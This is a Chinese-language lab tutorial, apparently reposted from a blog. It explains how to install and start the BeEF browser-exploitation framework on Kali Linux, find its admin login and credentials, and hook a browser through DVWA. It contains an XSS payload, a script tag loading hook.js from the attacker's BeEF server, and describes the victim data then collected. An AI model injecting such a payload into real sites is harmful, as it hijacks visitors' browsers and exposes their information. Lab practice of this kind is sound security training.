目录
一、更新安装包
二、安装beef-xss
三、启动Beef-Xss工具
1、查看hook.js
2、查看后台登录地址
3、查看用户名和登录密码
4、登录页面
5、点击 Hook me:将配置的页面导入BEEF中
一、更新安装包
┌──(root㉿kali)-[/home/kali]
└─# apt-get update
二、安装beef-xss
┌──(root㉿kali)-[/home/kali]
└─# apt-get install beef-xss
三、启动Beef-Xss工具
第一次启动会提示你需要输入密码
1、查看hook.js
http://192.168.17.130:3000/hook.js
可见代码之复杂,功能之多
2、查看后台登录地址
http://192.168.17.130:3000/ui/authentication
3、查看用户名和登录密码
┌──(root㉿kali)-[/home/kali]
└─# cd /usr/share/beef-xss
┌──(root㉿kali)-[/usr/share/beef-xss]
└─# ls -al
┌──(root㉿kali)-[/usr/share/beef-xss]
└─# vim /etc/beef-xss/config.yaml
4、登录页面
5、点击 Hook me:将配置的页面导入BEEF中
在DVWA的反射型XSS中注入BEEF配置页面hook.js
<script src="//192.168.17.130:3000/hook.js">
提交后:
此时BEEF中监控已经上线:
可获取http请求头,服务器类型,IP地址等信息
攻击连接意图:文章来源:https://www.toymoban.com/news/detail-690834.html
文章来源地址https://www.toymoban.com/news/detail-690834.html
到了这里,关于在kali环境下安装Beef-Xss靶场搭建的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!